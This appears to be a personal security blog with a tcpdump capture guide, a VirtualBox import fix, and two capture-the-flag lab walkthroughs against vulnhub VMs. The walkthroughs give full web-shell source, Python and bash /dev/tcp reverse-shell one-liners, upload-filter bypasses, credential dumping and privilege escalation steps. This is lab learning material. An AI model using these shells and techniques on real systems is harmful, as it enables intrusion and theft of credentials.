8/04/2016

PCAP or it didn't happen

"PCAP or it didn't happen" is a good network security philosophy. The primary idea being to capture network traffic for analysis. In a non-corporate environment where a CentOS-based Linux host has been used as a dual homed firewall (refer to the lame ASCII art network diagram below), tcpdump was used for continuous traffic capture.
    _                                       _
  _( )______     ________     +-----+     _( )__
 ( Internet )---/ Router \----| F/W |----( DMZ  )
(____________)  \________/    +-----+   (________)


Firstly, we create a location to save the pcap files. Next, since contemporary version of tcpdump are baked with the -Z switch which causes tcpdump to drop into a less privileges account (tcpdump in the case of this particular version of CentOS) we change ownership and permissions to the location, and change permissions to allow the tcpdump user and group to have full read and write permission.

We then execute the tcpdump command to dump traffic on the interface connected to the router (-i eth1) without resolving names (-n), only slightly verbose output (-v), capturing the full frame, i.e. snap length of 0 (-s 0), with a maximum file size of 512MB (-C 512), limit the number of files to keep to 10 (-W 10) and write to the file /var/log/traffic/capture.pcap (-w /var/log/traffic/capture.pcap).

Since the login was an interactive one, we employ the nohup command to prevent hang-up, i.e redirect input and output from stdin and stdout, and the & operator to  detach the command from the current terminal and send it into the background.
  1. mkdir -p /var/log/traffic
  2. chown -R tcpdump:tcpdump /var/log/traffic
  3. chmod -R 775 /var/log/traffic
  4.  nohup /usr/sbin/tcpdump -i eth1 -n -v -s 0 -C 512 -W 10 -w /var/log/traffic/capture.pcap &
Finally to ensure that the command is executed if the server is rebooted after any hardware maintenance, we can copy the command in step 4 above into the /etc/rc.d/rc.local file without the preceding nohup. We now should have a series of pcap files, totaling up to 5GB of network traffic, depending on requirements and available resources the parameters can be tweaked to suit the number and size of files required. 

1/19/2016

vulnhub.com sickos1.1

host: 192.168.56.1
dhcp-server: 192.168.56.100
kali: 192.168.56.101

* log
  # 2015/12/26 19:00 -> 19:40 (40min)
  # 2015/12/26 22:10 -> 23:50 (1hr 40min)
  # 2015/12/27 18:20 -> 18:40 (20min)
  # total time = 2hr 40min)

* discovery - target
  * nmap --min-parallelism=100 -sP -T5 192.168.56.0/24
  * found: 192.168.56.102

* discovery - services
  * nmap --min-parallelism=100 -A -T5 -p1-65535 192.168.56.102
  * found: port 22/tcp ssh, 3128/tcp squid, 8080/tcp ??
  * !!exploit-db did not reveal much
  * tried: nc -n -v 192.168.56.102 3128
  * with GET /
    * found: invalid URL error
  * with GET http://127.0.0.1/
    * found: landing page with BLEHHH!!! and PHP/5.3.10-1ubuntu3.21
  * using proxy: export http_proxy="http://192.168.56.102:3128"
  * wget http://192.168.56.102/robots.txt
  * found http://192.168.56.102/wolfcms
  * !!decided to use iceweasel with proxy instead of command line
    * did not find generator metatag
    * downloaded wolfcms
      * found: README.md, requested http://192.168.56.102/wolfcms/README.md
      * found: version = 0.8.2
      * found: , requested http://192.168.56.102/wolfcms/wolf/plugins/file_manager/file_manager.css
      * found: http://192.168.56.102/wolfcms/wolf/plugins/ is also browseable
      * found: that file_manager plugin is installed
    * read 
      - https://www.wolfcms.org/download/security-patches.html
      - http://www.securityfocus.com/archive/1/521797
      - https://www.exploit-db.com/exploits/36818/
      - https://packetstormsecurity.com/files/133011/Wolf-CMS-0.8.2-Open-Redirect.html 
      - https://github.com/wolfcms/wolfcms/issues/619
    * vulnerabilities
      * file upload
      * open redirect
    * stupidly tried admin/admin
    * uploaded shell.php using file uploaded
    * http://192.168.56.102/wolfcms/public/shell.php?cmd=id
    * used shell.php 
      * found: config.php using curl http://192.168.56.ll.php -d cmd="cat ../config.php"
      * found: mysql db=wolf, username=root, password=john@123
    * used curl http://192.168.56.102/wolfcms/public/shell.php --data-urlencode "cmd=mysqldump -u root -pjohn@123 mysql"
      * found:
    * used shell.php to list directories
      * found: /var/www/connect.py
    * attempted python reverse shell
      * kali - nc -vvv -l -p 1234
      * sickos - curl http://192.168.56.102/wolfcms/public/shell.php --data-urlencode "cmd=/usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.56.101\",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/bash\",\"-i\"]);'"
    * attempted to get tty, inside reverse shell
      * /usr/bin/python -c 'import pty; pty.spawn("/bin/sh")'
    * tried to use su - sickos, using the mysql password john@123, worked!!
    * sudo bash
    * ls -l /root
    * cat a0216ea4d51874464078c618298b1367.txt
    


* appendix

// shell.php
-- start of shell.php --
<?php
if(isset($_REQUEST['cmd']))
{
  $cmd = $_REQUEST['cmd'];
  system($cmd);
  echo "<pre>$cmd</pre>";
}
else
{
  echo "<pre>usage: ?cmd=</pre>";
}
?>
-- end of shell.php --

Error importing into Virtualbox

Open visualisation format (OVF) is an open standard for packaging and distributing virtual appliances. Essentially this is meant to ensure portability of software and virtual machines across different hypervisors, such as vmware, virtualbox, etc. However, I got an error when importing an OVF file into virtualbox Version 5.0.12 r104815

"Host resource of type "Other Storage Device (20)" is supported with SATA AHCI controllers only, line 47."

Error reading "XXXXXX.ovf": Host resource of type "Other Storage Device (20)" is supported with SATA AHCI controllers only, line 47.


Result Code: 
VBOX_E_FILE_ERROR (0x80BB0004)
Component: 
ApplianceWrap
Interface: 
IAppliance {XXXXXX}

Fixed it by following the instructions on the forum[1]
  1. Edited .ovf file in vim.
    • :%s/ElementName/Caption/g
    • :%s/vmware.sata.ahci/AHCI/
  2. Deleted .mf file, else get an error regarding failure to verify manifest

Attempted re-import of appliance into VirtualBox 5. Only noticeable issue was the name defaulted to "vm", which was easily resolved by double clicking name and entering correct name for the virtual machine.

References:

  1. https://forums.virtualbox.org/viewtopic.php?f=8&t=61624

vulnhub.com fristileaks1.3

host: 192.168.56.1
dhcp-server: 192.168.56.100
kali: 192.168.56.101

* log
  # 2015/12/24 14:45 -> 16:30 (1hr 45min)
  # 2015/12/25 15:00 -> 17:45 (2hr 45min)
  # total time = 4hrs 30min

* discovery - target
  * nmap --min-parallelism=100 -sP -T5 192.168.56.0/24
  * found target: 192.168.56.102
  
* discovery - services
  * nmap --min-parallelism=100 -A -T5 -p1-65535 192.168.56.102
  * found ports: 80

* enumerate port 80
  * wget http://192.168.56.102
  * cat index.html
  * wget http://192.168.56.102/images/keep-calm.png
  * wget http://192.168.56.102/robots.txt
    * robots.txt: disallow /cola /sisi /beer
  * wget http://192.168.56.102/cola/
    * since its not the URL, and we should drink fristi
  * wget http://192.168.56.102/fristi/
    * cat index.html
      * read description meta tag reg comment about base64
      * noticed second commented out base64
      * suspect username: eezeepz
    * extracted commented out line using vi
      * deleted other lines
      * joined all lines (:%j)
      * removed spaces (:%s/\ //g)
      * saved into fristi_img2.txt
  * base64 -d fristi_img2.txt > img2
  * file img2
  * mv img2 img2.png
  * suspect password: keKkeKKeKKeKkEkkEk

* access
  * http://192.168.56.102/fristi/
  * myusername: eezeepz, mypassword: keKkeKKeKKeKkEkkEk
  * logged into http://192.168.56.102/fristi/login_success.php
  * clicked upload file link to http://192.168.56.102/fristi/upload.php
  * uploaded img2.png and got message regarding /uploads
  * verified upload location http://192.168.56.102/fristi/uploads/img2.png

* attempted shell access using weevely (failed)
  * generated weevely shell: weevely generate password shell.php
  * cp /usr/share/weevely/shell.php .
  * attempted upload: only allowed png,jpg,gif
  * mv shell.php shell.gif
  * uploaded and connected
  * weevely http://192.168.56.102/fristi/uploads/shell.gif password
  * fixed pythong issues
    * tar zxvf PySocks-1.5.6.tar.gz
    * cd PySocks-1.5.6/
    * ./setup.py build
    * ./setup.py install
  * weevely http://192.168.56.102/fristi/uploads/shell.gif password
  * unable to connect

* used old script to execute commands
  * renamed to shell.php.jpg
  * uploaded file
  * curl http://192.168.56.102/fristi/uploads/shell.php.jpg?cmd=id
  * uid=48(apache) gid=48(apache) groups=48(apache)
  * curl http://192.168.56.102/fristi/uploads/shell.php.jpg -d cmd="cat /etc/passwd"
  * found: eezeepz, admin, fristigod, fristi
  * ls -l /home/
  * found: drwx---r-x. on eezeepz
  * ls -l /home/eezeepz
  * found: 
    * notes.txt
    * commands (various)
  * cat /home/eezeepz/notes.txt
  * found: 
    * cron runs /tmp/runthis with admin privileges every minute
    * commands chmod, df, cat, echo, ps, grep, egrep in /home/admin
    * access to /usr/bin/*
  * changed access to /home/admin
    * curl http://192s/shell.php.jpg -d cmd="echo '/home/admin/chmod 755 /home/admin/' > /tmp/runthis"
  * ls -las /home/admin/
  * found: cryptedpass.txt, cryptpass.py, and whoisyourgodnow.txt (owner by fristigod)
  * cat /home/admin/whoisyourgodnow.txt
  * found: =RFn0AKnlMHMPIzpyuTI0ITG
  * cat /home/admin/cryptedpass.txt
  * found: mVGZ3O3omkJLmy2pcuTq
  * cat /home/admin/cryptpass.py
  * found:
    * function does base64 then rot13
  * created own script to decrypt password
  * python ./decryptpass.py mVGZ3O3omkJLmy2pcuTq
  * found: thisisalsopw123
  * python ./decryptpass.py =RFn0AKnlMHMPIzpyuTI0ITG
  * found: LetThereBeFristi!
 
* interactive shell
  * got tired of using the php script and decided to get interactive shell
  * on kali: nc -n -vvv -l -p 80
  * ran via php: /bin/bash -i > /dev/tcp/192.168.56.101/80 0<&1 2>&1, but encoded for url as %2Fbin%2Fbash%20-i%20%3E%20%2Fdev%2Ftcp%2F192.168.56.101%2F80%200%3C%261%202%3E%261
  * now have shell (without TTY, so cannot use su yet)
  * find files owned by users
    * find / -user eezeepz 2>&1 | grep -v "Permission denied"
    * find / -user admin 2>&1 | grep -v "Permission denied"
    * find / -user fristi 2>&1 | grep -v "Permission denied"
    * find / -user fristigod 2>&1 | grep -v "Permission denied"
      * found: /var/fristigod
    * found: empty mailboxes
    * found: /var/www/notes.txt 
      * not very useful since we already figured this out
  * tried to get tty shell 
    // https://pen-testing.sans.org/blog/2014/07/08/sneaky-stealthy-su-in-web-shells
    // http://netsec.ws/?p=337
  * /usr/bin/python -c 'import pty; pty.spawn("/bin/sh")'
  * used: su fristigod and password: LetThereBeFristi!
  * cd /var/fristigod
  * ls -las 
  * found: .bash_history and .secret_admin_stuff
  * cat .bash_history
  * found: sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
  * ls -las /var/fristigod/.secret_admin_stuff/
  * found: suid/guid set on doCom file and owned by root:root
  * file /var/fristigod/.secret_admin_stuff/doCom
  * strings /var/fristigod/.secret_admin_stuff/doCom
  * sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
  * found: Usage: ./program_name terminal_command ...
  * sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom id
  * found: uid=0(root) gid=100(users) groups=100(users),502(fristigod)
  * sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom bash
  !! got root !!
  * found: cat /root/fristileaks_secrets.txt
  * cat /root/fristileaks_secrets.txt
  * found: Flag: Y0u_kn0w_y0u_l0ve_fr1st1

# Other
* /root/.c has source for doCom
* cat /root/.mysql_history
  

* appendix
// http://snipplr.com/view/72936/simple-php-backdoor-shell/
-- start of old script -- 
<?php
if(isset($_REQUEST['cmd']))
{
  $cmd = $_REQUEST['cmd'];
  system($cmd);
  echo "<pre>$cmd</pre>";
}
else
{
  echo "<pre>usage: ?cmd=</pre>";
}
?>
-- end of old script


// modified cryptpass.py script
-- start of decryptpass.py script --
import base64,codecs,sys

#def encodeString(str):
#    base64string= base64.b64encode(str)
#    return codecs.encode(base64string[::-1], 'rot13')

def decodeString(str):
    rottedString= codecs.encode(str[::-1], 'rot13')
    return base64.b64decode(rottedString)

#cryptoResult=encodeString(sys.argv[1])
#print cryptoResult

#decryptedResult=decodeString(cryptoResult)
#print decryptedResult

decryptedResult=decodeString(sys.argv[1])
print decryptedResult
-- end of decryptpass.py script --